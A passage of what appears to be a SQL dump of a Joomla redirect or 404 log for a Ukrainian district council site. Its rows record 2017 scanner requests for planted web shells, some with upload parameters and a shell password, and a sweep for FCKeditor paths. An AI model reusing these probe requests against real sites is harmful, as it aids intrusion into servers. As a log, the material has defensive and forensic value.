20:31:12','0000-00-00 00:00:00',301),(30355,'http://www.malyn-rayrada.gov.ua/configbak.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:31:43','0000-00-00 00:00:00',301),(30356,'http://www.malyn-rayrada.gov.ua/wp-data.php?z3=ehyzyvhslnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:31:59','0000-00-00 00:00:00',301),(30357,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/fbrrchive.php?z3=ehyzyvhslnboca==&z4=l3dwlwnvbnrlbnqvcgx1z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:32:21','0000-00-00 00:00:00',301),(30358,'http://www.malyn-rayrada.gov.ua/wp-content/uploads/fbrrchive.php?z3=ehyzyvhslnboca==&z4=l3dwlwnvbnrlbnqvdxbsb2fkcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:32:40','0000-00-00 00:00:00',301),(30359,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/myshe.php?z3=ehyzyvhslnboca==&z4=l3dwlwnvbnrlbnqvcgx1z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:33:02','0000-00-00 00:00:00',301),(30360,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wp-cache.php?z3=ehyzyvhslnboca==&z4=l3dwlwnvbnrlbnqvcgx1z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:33:11','0000-00-00 00:00:00',301),(30361,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wp-footers.php?z3=ehyzyvhslnboca==&z4=l3dwlwnvbnrlbnqvcgx1z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:33:28','0000-00-00 00:00:00',301),(30362,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wpfootes.php?z3=ehyzyvhslnboca==&z4=l3dwlwnvbnrlbnqvcgx1z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:33:42','0000-00-00 00:00:00',301),(30363,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/sql_dump.php?z3=ehyzyvhslnboca==&z4=l3dwlwnvbnrlbnqvcgx1z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:33:57','0000-00-00 00:00:00',301),(30364,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/socketiontrol.php?z3=ehyzyvhslnboca==&z4=l3dwlwnvbnrlbnqvcgx1z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:34:09','0000-00-00 00:00:00',301),(30365,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/socketiasrgasfontrol.php?z3=ehyzyvhslnboca==&z4=l3dwlwnvbnrlbnqvcgx1z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:34:26','0000-00-00 00:00:00',301),(30366,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/analyser.php?z3=ehyzyvhslnboca==&z4=l3dwlwnvbnrlbnqvcgx1z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:34:46','0000-00-00 00:00:00',301),(30367,'http://www.malyn-rayrada.gov.ua/cache/list.php?z3=ehyzyvhslnboca==&z4=l2nhy2hllw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-05-21 20:34:59','0000-00-00 00:00:00',301),(30368,'http://www.malyn-rayrada.gov.ua/tmp/sfx.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:35:16','0000-00-00 00:00:00',301),(30369,'http://www.malyn-rayrada.gov.ua/m.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:35:21','0000-00-00 00:00:00',301),(30370,'http://www.malyn-rayrada.gov.ua/ny.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:35:32','0000-00-00 00:00:00',301),(30371,'http://www.malyn-rayrada.gov.ua/tmp/guide.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:35:43','0000-00-00 00:00:00',301),(30372,'http://www.malyn-rayrada.gov.ua/media/jss.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:35:50','0000-00-00 00:00:00',301),(30373,'http://www.malyn-rayrada.gov.ua/nktt.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:36:05','0000-00-00 00:00:00',301),(30374,'http://www.malyn-rayrada.gov.ua/zibi.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:36:09','0000-00-00 00:00:00',301),(30375,'http://www.malyn-rayrada.gov.ua/u.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:36:14','0000-00-00 00:00:00',301),(30376,'http://www.malyn-rayrada.gov.ua/ws0.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:36:19','0000-00-00 00:00:00',301),(30377,'http://www.malyn-rayrada.gov.ua/active.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:36:29','0000-00-00 00:00:00',301),(30378,'http://www.malyn-rayrada.gov.ua/images/stories/alfa.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:36:35','0000-00-00 00:00:00',301),(30379,'http://www.malyn-rayrada.gov.ua/images/stories/s.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:36:37','0000-00-00 00:00:00',301),(30380,'http://www.malyn-rayrada.gov.ua/images/stories/black.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:36:42','0000-00-00 00:00:00',301),(30381,'http://www.malyn-rayrada.gov.ua/images/p.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:36:56','0000-00-00 00:00:00',301),(30382,'http://www.malyn-rayrada.gov.ua/help.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',4,0,'2017-05-21 20:37:03','0000-00-00 00:00:00',301),(30383,'http://www.malyn-rayrada.gov.ua/libraries/respectmuslims.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:37:05','0000-00-00 00:00:00',301),(30384,'http://www.malyn-rayrada.gov.ua/libraries/joomla/zipy.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:37:13','0000-00-00 00:00:00',301),(30385,'http://www.malyn-rayrada.gov.ua/tmp/pz.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:37:19','0000-00-00 00:00:00',301),(30386,'http://www.malyn-rayrada.gov.ua/go.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:37:24','0000-00-00 00:00:00',301),(30387,'http://www.malyn-rayrada.gov.ua/wp-configuration.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:37:26','0000-00-00 00:00:00',301),(30388,'http://www.malyn-rayrada.gov.ua/images/stories/3xp.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:37:31','0000-00-00 00:00:00',301),(30389,'http://www.malyn-rayrada.gov.ua/images/stories/xsamxadoo.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:37:43','0000-00-00 00:00:00',301),(30390,'http://www.malyn-rayrada.gov.ua/tmp/petx.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:37:51','0000-00-00 00:00:00',301),(30391,'http://www.malyn-rayrada.gov.ua/tmp/bogel.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:37:54','0000-00-00 00:00:00',301),(30392,'http://www.malyn-rayrada.gov.ua/images/stories/0d4y.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:37:58','0000-00-00 00:00:00',301),(30393,'http://www.malyn-rayrada.gov.ua/cache/clean.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:38:08','0000-00-00 00:00:00',301),(30394,'http://www.malyn-rayrada.gov.ua/images/stories/a.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:38:12','0000-00-00 00:00:00',301),(30395,'http://www.malyn-rayrada.gov.ua/b1.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:38:17','0000-00-00 00:00:00',301),(30396,'http://www.malyn-rayrada.gov.ua/mide.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:38:22','0000-00-00 00:00:00',301),(30397,'http://www.malyn-rayrada.gov.ua/wp-content/upgrade/theme-compat/popup-pomo.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:38:32','0000-00-00 00:00:00',301),(30398,'http://www.malyn-rayrada.gov.ua/images/stories/shell.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:38:38','0000-00-00 00:00:00',301),(30399,'http://www.malyn-rayrada.gov.ua/images/stories/filemga.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:38:41','0000-00-00 00:00:00',301),(30400,'http://www.malyn-rayrada.gov.ua/images/stories/0day.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:38:46','0000-00-00 00:00:00',301),(30401,'http://www.malyn-rayrada.gov.ua/default_component.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:38:51','0000-00-00 00:00:00',301),(30402,'http://www.malyn-rayrada.gov.ua/images/w0rm.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:38:55','0000-00-00 00:00:00',301),(30403,'http://www.malyn-rayrada.gov.ua/images/sym.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:39:01','0000-00-00 00:00:00',301),(30404,'http://www.malyn-rayrada.gov.ua/images/wp-mail.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:39:08','0000-00-00 00:00:00',301),(30405,'http://www.malyn-rayrada.gov.ua/media/jmail.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:39:13','0000-00-00 00:00:00',301),(30406,'http://www.malyn-rayrada.gov.ua/images/stories/webroot.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:39:15','0000-00-00 00:00:00',301),(30407,'http://www.malyn-rayrada.gov.ua/images/upa.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:39:25','0000-00-00 00:00:00',301),(30408,'http://www.malyn-rayrada.gov.ua/images/stories/u.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:39:26','0000-00-00 00:00:00',301),(30409,'http://www.malyn-rayrada.gov.ua/images/stories/ali.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:39:33','0000-00-00 00:00:00',301),(30410,'http://www.malyn-rayrada.gov.ua/hh.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:39:37','0000-00-00 00:00:00',301),(30411,'http://www.malyn-rayrada.gov.ua/images/stories/gh.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:39:40','0000-00-00 00:00:00',301),(30412,'http://www.malyn-rayrada.gov.ua/tmp/upxx.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:39:46','0000-00-00 00:00:00',301),(30413,'http://www.malyn-rayrada.gov.ua/images/upxx.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:39:50','0000-00-00 00:00:00',301),(30414,'http://www.malyn-rayrada.gov.ua/images/stories/gass.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:39:57','0000-00-00 00:00:00',301),(30415,'http://www.malyn-rayrada.gov.ua/up14.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:40:01','0000-00-00 00:00:00',301),(30416,'http://www.malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/xv3axr.php',NULL,'','',1,0,'2017-05-21 20:40:11','0000-00-00 00:00:00',301),(30417,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/revslider/temp/update_extract/xv3axr.php',NULL,'','',1,0,'2017-05-21 20:40:19','0000-00-00 00:00:00',301),(30418,'http://www.malyn-rayrada.gov.ua/wp-content/uploads/xv3axr.php',NULL,'','',1,0,'2017-05-21 20:40:23','0000-00-00 00:00:00',301),(30419,'http://www.malyn-rayrada.gov.ua/xv3axr.php',NULL,'','',1,0,'2017-05-21 20:40:33','0000-00-00 00:00:00',301),(30420,'http://www.malyn-rayrada.gov.ua/sites/all/libraries/elfinder/files/xv3axr.php',NULL,'','',1,0,'2017-05-21 20:40:40','0000-00-00 00:00:00',301),(30421,'http://www.malyn-rayrada.gov.ua/wp-installation.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:40:42','0000-00-00 00:00:00',301),(30422,'http://www.malyn-rayrada.gov.ua/e.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:40:46','0000-00-00 00:00:00',301),(30423,'http://www.malyn-rayrada.gov.ua/jijle3.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:40:46','0000-00-00 00:00:00',301),(30424,'http://www.malyn-rayrada.gov.ua/xup.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:40:48','0000-00-00 00:00:00',301),(30425,'http://www.malyn-rayrada.gov.ua/zebda.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:40:49','0000-00-00 00:00:00',301),(30426,'http://www.malyn-rayrada.gov.ua/kk.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:40:52','0000-00-00 00:00:00',301),(30427,'http://www.malyn-rayrada.gov.ua/wp_logns.php?x=upload&mode=upload&upload=&ssp=rfvbhu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&h=',NULL,'','',2,0,'2017-05-21 20:40:58','0000-00-00 00:00:00',301),(30428,'http://www.malyn-rayrada.gov.ua/templates/jtemplate/index.html',NULL,'http://www.malyn-rayrada.gov.ua/templates/jtemplate/index.html','',1,0,'2017-05-22 05:00:14','0000-00-00 00:00:00',301),(30429,'http://www.malyn-rayrada.gov.ua/main/inc/lib/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:07','0000-00-00 00:00:00',301),(30430,'http://www.malyn-rayrada.gov.ua/news/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:08','0000-00-00 00:00:00',301),(30431,'http://www.malyn-rayrada.gov.ua/js/new/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:08','0000-00-00 00:00:00',301),(30432,'http://www.malyn-rayrada.gov.ua/inc/library/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:08','0000-00-00 00:00:00',301),(30433,'http://www.malyn-rayrada.gov.ua/js/data/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:08','0000-00-00 00:00:00',301),(30434,'http://www.malyn-rayrada.gov.ua/lib/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:08','0000-00-00 00:00:00',301),(30435,'http://www.malyn-rayrada.gov.ua/js/lib/fckeditor/editor/dialog/fck_about.html',NULL,'','',2,0,'2017-05-22 05:04:08','0000-00-00 00:00:00',301),(30436,'http://www.malyn-rayrada.gov.ua/outils/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:08','0000-00-00 00:00:00',301),(30437,'http://www.malyn-rayrada.gov.ua/scripts/fckeditor/editor/dialog/fck_about.html',NULL,'','',3,0,'2017-05-22 05:04:08','0000-00-00 00:00:00',301),(30438,'http://www.malyn-rayrada.gov.ua/javascript/editors/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:08','0000-00-00 00:00:00',301),(30439,'http://www.malyn-rayrada.gov.ua/data/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:09','0000-00-00 00:00:00',301),(30440,'http://www.malyn-rayrada.gov.ua/plugins/fckeditor/editor/dialog/fck_about.html',NULL,'','',2,0,'2017-05-22 05:04:09','0000-00-00 00:00:00',301),(30441,'http://www.malyn-rayrada.gov.ua/js/home/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:09','0000-00-00 00:00:00',301),(30442,'http://www.malyn-rayrada.gov.ua/editor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:09','0000-00-00 00:00:00',301),(30443,'http://www.malyn-rayrada.gov.ua/inc/home/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:09','0000-00-00 00:00:00',301),(30444,'http://www.malyn-rayrada.gov.ua/html/js/editor/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:09','0000-00-00 00:00:00',301),(30445,'http://www.malyn-rayrada.gov.ua/include/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:10','0000-00-00 00:00:00',301),(30446,'http://www.malyn-rayrada.gov.ua/manage/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:10','0000-00-00 00:00:00',301),(30447,'http://www.malyn-rayrada.gov.ua/editorold/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:10','0000-00-00 00:00:00',301),(30448,'http://www.malyn-rayrada.gov.ua/editor1/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:10','0000-00-00 00:00:00',301),(30449,'http://www.malyn-rayrada.gov.ua/new/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:10','0000-00-00 00:00:00',301),(30450,'http://www.malyn-rayrada.gov.ua/admin/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:10','0000-00-00 00:00:00',301),(30451,'http://www.malyn-rayrada.gov.ua/js/admin/templates/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:10','0000-00-00 00:00:00',301),(30452,'http://www.malyn-rayrada.gov.ua/js/editor/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:10','0000-00-00 00:00:00',301),(30453,'http://www.malyn-rayrada.gov.ua/js/editor/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:10','0000-00-00 00:00:00',301),(30454,'http://www.malyn-rayrada.gov.ua/js/modules/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:10','0000-00-00 00:00:00',301),(30455,'http://www.malyn-rayrada.gov.ua/js/outils/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:10','0000-00-00 00:00:00',301),(30456,'http://www.malyn-rayrada.gov.ua/administartor/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:11','0000-00-00 00:00:00',301),(30457,'http://www.malyn-rayrada.gov.ua/project/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:11','0000-00-00 00:00:00',301),(30458,'http://www.malyn-rayrada.gov.ua/js/news/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:11','0000-00-00 00:00:00',301),(30459,'http://www.malyn-rayrada.gov.ua/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:11','0000-00-00 00:00:00',301),(30460,'http://www.malyn-rayrada.gov.ua/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:11','0000-00-00 00:00:00',301),(30461,'http://www.malyn-rayrada.gov.ua/home/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:12','0000-00-00 00:00:00',301),(30462,'http://www.malyn-rayrada.gov.ua/library/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:12','0000-00-00 00:00:00',301),(30463,'http://www.malyn-rayrada.gov.ua/system/fckeditor/editor/dialog/fck_about.html',NULL,'','',2,0,'2017-05-22 05:04:12','0000-00-00 00:00:00',301),(30464,'http://www.malyn-rayrada.gov.ua/common/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:12','0000-00-00 00:00:00',301),(30465,'http://www.malyn-rayrada.gov.ua/sysadmin/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:12','0000-00-00 00:00:00',301),(30466,'http://www.malyn-rayrada.gov.ua/javascript/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:12','0000-00-00 00:00:00',301),(30467,'http://www.malyn-rayrada.gov.ua/fckeditornew/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:12','0000-00-00 00:00:00',301),(30468,'http://www.malyn-rayrada.gov.ua/inc/new/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:12','0000-00-00 00:00:00',301),(30469,'http://www.malyn-rayrada.gov.ua/editor/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:12','0000-00-00 00:00:00',301),(30470,'http://www.malyn-rayrada.gov.ua/templates/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:12','0000-00-00 00:00:00',301),(30471,'http://www.malyn-rayrada.gov.ua/ckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:12','0000-00-00 00:00:00',301),(30472,'http://www.malyn-rayrada.gov.ua/js/plugins/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:12','0000-00-00 00:00:00',301),(30473,'http://www.malyn-rayrada.gov.ua/fck/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:12','0000-00-00 00:00:00',301),(30474,'http://www.malyn-rayrada.gov.ua/includes/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:13','0000-00-00 00:00:00',301),(30475,'http://www.malyn-rayrada.gov.ua/main/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:13','0000-00-00 00:00:00',301),(30476,'http://www.malyn-rayrada.gov.ua/admin/templates/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:13','0000-00-00 00:00:00',301),(30477,'http://www.malyn-rayrada.gov.ua/js/library/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:13','0000-00-00 00:00:00',301),(30478,'http://www.malyn-rayrada.gov.ua/support/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:13','0000-00-00 00:00:00',301),(30479,'http://www.malyn-rayrada.gov.ua/fckeditorold/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:15','0000-00-00 00:00:00',301),(30480,'http://www.malyn-rayrada.gov.ua/js/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:15','0000-00-00 00:00:00',301),(30481,'http://www.malyn-rayrada.gov.ua/inc/news/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:15','0000-00-00 00:00:00',301),(30482,'http://www.malyn-rayrada.gov.ua/modules/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:15','0000-00-00 00:00:00',301),(30483,'http://www.malyn-rayrada.gov.ua/inc/fckeditor/editor/dialog/fck_about.html',NULL,'','',1,0,'2017-05-22 05:04:15','0000-00-00 00:00:00',301),(30484,'http://malyn-rayrada.gov.ua/templates/jtemplate/index.html',NULL,'http://malyn-rayrada.gov.ua/templates/jtemplate/index.html','',1,0,'2017-05-22 06:32:32','0000-00-00 00:00:00',301),(30485,'http://www.malyn-rayrada.gov.ua/templates/j2template/index.html',NULL,'http://www.malyn-rayrada.gov.ua/templates/j2template/index.html','',1,0,'2017-05-22 15:05:08','0000-00-00 00:00:00',301),(30486,'http://malyn-rayrada.gov.ua/templates/j2template/index.html',NULL,'http://malyn-rayrada.gov.ua/templates/j2template/index.html','',1,0,'2017-05-22 16:54:50','0000-00-00 